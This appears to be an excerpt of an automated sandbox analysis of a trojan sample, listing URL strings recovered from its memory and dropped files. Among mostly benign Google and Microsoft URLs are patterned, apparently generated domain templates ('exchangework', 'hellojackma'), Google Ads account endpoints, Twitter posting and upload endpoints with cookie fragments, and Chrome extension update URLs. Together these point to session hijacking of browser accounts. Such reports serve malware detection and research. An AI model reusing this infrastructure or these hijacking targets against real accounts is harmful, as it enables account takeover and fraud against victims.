Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://apis.google.com
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: Web Data1618258532140.6.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.354726295.0000000002135000.00000004.00000040.sdmp	String found in binary or memory: https://charlesproxy.com/ssl1
Source: 26FF190E7AE0F7C7.exe, 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364093257.0000000003FA5000.00000004.00000001.sdmp, background.js.7.dr	String found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.363870256.0000000003F1B000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364704865.0000000003F3A000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxT
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364818535.0000000003F25000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxi
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxj
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364841271.0000000002F26000.00000004.00000001.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxset_
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://content.googleapis.com
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://contextual.media.net/
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439393307.0000000003140000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.369987694.0000000003170000.00000004.00000001.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/248/152/169/520bb037-5f8d-42d6-934b-d6ec4a6832e8.jpg?v=9
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/237/70/222/47ef75a1-aa03-4dce-a349-91d6a5ed47bb.jpg?v=9
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9B620FEE
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364768213.0000000003F2A000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364768213.0000000003F2A000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_app1iB
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://drive.google.com/drive/settings
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/drive/settingsr
Source: Web Data1618258532140.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data1618258532140.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data1618258532140.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://hellojackma%04d%02d.com/hellojackma%04d%02d1.com/helloja
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://feedback.googleusercontent.com
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com;
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.363870256.0000000003F1B000.00000004.00000001.sdmp	String found in binary or memory: https://hangouts.google.com/
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://mail.google.com/mail
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://mail.google.com/mail/#settings
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.360425883.0000000003F11000.00000004.00000001.sdmp	String found in binary or memory: https://mail.google.com/mail/#settingsFTGxQ
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364704865.0000000003F3A000.00000004.00000001.sdmp	String found in binary or memory: https://mail.google.com/mailk
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://payments.google.com/
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.360425883.0000000003F11000.00000004.00000001.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://pki.goog/repository/0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364737158.0000000003F1C000.00000004.00000001.sdmp	String found in binary or memory: https://sandbox.google.com/
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.360425883.0000000003F11000.00000004.00000001.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: Web Data1618258532140.6.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Web Data1618258532140.6.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.377355169.0000000003EF8000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.377302172.0000000003FE1000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.435810988.0000000003EE3000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.435810988.0000000003EE3000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flashM
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.377145745.0000000004090000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.435810988.0000000003EE3000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.377145745.0000000004090000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.377355169.0000000003EF8000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.377302172.0000000003FE1000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000006.00000003.435810988.0000000003EE3000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.435810988.0000000003EE3000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784U
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ookie:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comReferer:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.439843549.000000000330C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.370303228.000000000333C000.00000004.00000001.sdmp, ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=1824632442.1601478955
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.364667666.0000000003F55000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.360425883.0000000003F11000.00000004.00000001.sdmp, ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecv5AA4.tmp.11.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
